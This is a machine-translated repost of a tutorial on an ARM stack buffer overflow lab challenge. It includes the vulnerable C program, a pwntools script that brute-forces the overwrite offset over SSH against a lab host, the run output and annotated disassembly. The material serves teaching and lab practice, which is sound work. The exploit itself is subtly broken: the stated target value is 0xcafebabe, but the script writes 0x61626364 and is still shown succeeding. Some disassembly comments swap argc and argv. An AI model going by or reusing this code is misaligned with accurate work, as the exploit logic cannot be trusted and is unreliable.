ARM BOF, 스택 데이터 überwrite
vulnerable
정수를 0xcafebabe
로 다시 쓰는 것입니다. 취약한 프로그램은 다음과 같습니다.#include <stdio.h>
#include <string.h>
#include <err.h>
int main(int argc, char**argv)
{
volatile int vulnerable;
char buffer[64];
if (argc == 1)
errx(1, "argument missing\n");
vulnerable = 0;
strcpy(buffer, argv[1]);
if (vulnerable == 0xcafebabe)
printf("congratulations\n");
else
printf("nope");
}
이전 익스플로잇을 기반으로 다음 익스플로잇을 작성할 수 있습니다.
#!/usr/bin/env python3
import struct
from pwn import *
socket = ssh(host='192.168.0.1', user='root', password='')
i = 60
while True:
i += 1
print('test', i)
payload = b'A' * i + struct.pack('<I', 0x61626364)
process = socket.process(
argv=['/root/protostarm/stack1/stack1', payload ],
)
res = process.recv().decode()
print('res =', res)
process.close()
if 'congratulations' in res:
break
socket.close()
축하합니다.
user@Azeria-Lab-VM:~/protoarm/stack1$ ./exploit.py
[+] Connecting to 192.168.0.1 on port 22: Done
[*] [email protected]:
Distro Debian testing
OS: linux
Arch: arm
Version: 4.9.0
ASLR: Enabled
test 61
[+] Starting remote process '/root/protostarm/stack1/stack1' on 192.168.0.1: pid 1585
res = nope
[*] Stopped remote process 'stack1' on 192.168.0.1 (pid 1585)
test 62
[+] Starting remote process '/root/protostarm/stack1/stack1' on 192.168.0.1: pid 1589
res = nope
[*] Stopped remote process 'stack1' on 192.168.0.1 (pid 1589)
test 63
[+] Starting remote process '/root/protostarm/stack1/stack1' on 192.168.0.1: pid 1593
res = nope
[*] Stopped remote process 'stack1' on 192.168.0.1 (pid 1593)
test 64
[+] Starting remote process '/root/protostarm/stack1/stack1' on 192.168.0.1: pid 1597
res = congratulations
[*] Stopped remote process 'stack1' on 192.168.0.1 (pid 1597)
[*] Closed connection to '192.168.0.1'
다시 말하지만, 우리는 정확한 오프셋을 무차별 대입했지만 분해에서 읽을 수 있습니다.
00000564 <main>:
epilog:
564: b580 push {r7, lr}
566: b094 sub sp, #80 ; 0x50 ; reserve 0x50 bytes for the stack
568: af00 add r7, sp, #0 ; r7 = sp
56a: 6078 str r0, [r7, #4] ; r0 = argv[0]
56c: 6039 str r1, [r7, #0] ; r1 = argc
56e: 687b ldr r3, [r7, #4]
570: 2b01 cmp r3, #1
572: d105 bne.n 580 <main+0x1c>
error:
574: 4b13 ldr r3, [pc, #76] ; (5c4 <main+0x60>)
576: 447b add r3, pc
578: 4619 mov r1, r3
57a: 2001 movs r0, #1 ; EXIT_FAILURE
57c: f7ff ef5e blx 43c <errx@plt>
read_and_compare_input:
580: 2300 movs r3, #0
582: 64fb str r3, [r7, #76]
584: 683b ldr r3, [r7, #0]
586: 3304 adds r3, #4
588: 681a ldr r2, [r3, #0] ; r2 = argv[1]
58a: f107 030c add.w r3, r7, #12 ; r3 = buffer of 76-12=64 bytes
58e: 4611 mov r1, r2
590: 4618 mov r0, r3
592: f7ff ef3c blx 40c <strcpy@plt> ; strcpy(buffer, argv[1]);
596: 6cfa ldr r2, [r7, #76] ; r2 = vulnerable
598: f246 3364 movw r3, #47806 ; set lower bits of r3 to 0xbabe
59c: f2c6 1362 movt r3, #51966 ; se higher bits fo r3 to 0xcafe
5a0: 429a cmp r2, r3 ; vulnerable == 0xcafebabe?
5a2: d105 bne.n 5b0 <main+0x4c>
good_boy:
5a4: 4b08 ldr r3, [pc, #32] ; (5c8 <main+0x64>)
5a6: 447b add r3, pc
5a8: 4618 mov r0, r3
5aa: f7ff ef36 blx 418 <puts@plt> ; puts("congratulations\n");
jump_to_epilog:
5ae: e004 b.n 5ba <main+0x56>
bad_boy:
5b0: 4b06 ldr r3, [pc, #24] ; (5cc <main+0x68>)
5b2: 447b add r3, pc
5b4: 4618 mov r0, r3
5b6: f7ff ef30 blx 418 <puts@plt> ; puts ("nope\n");
epilog:
5ba: 2300 movs r3, #0
5bc: 4618 mov r0, r3 ; return 0;
5be: 3750 adds r7, #80 ; 0x50
5c0: 46bd mov sp, r7
5c2: bd80 pop {r7, pc}
literal pool:
5c4: 000000a6
5c8: 0000008a
5cc: 0000008e
Reference
이 문제에 관하여(ARM BOF, 스택 데이터 überwrite), 우리는 이곳에서 더 많은 자료를 발견하고 링크를 클릭하여 보았다 https://dev.to/hextrace/arm-bof-uberwrite-stack-data-mo4텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
우수한 개발자 콘텐츠 발견에 전념 (Collection and Share based on the CC Protocol.)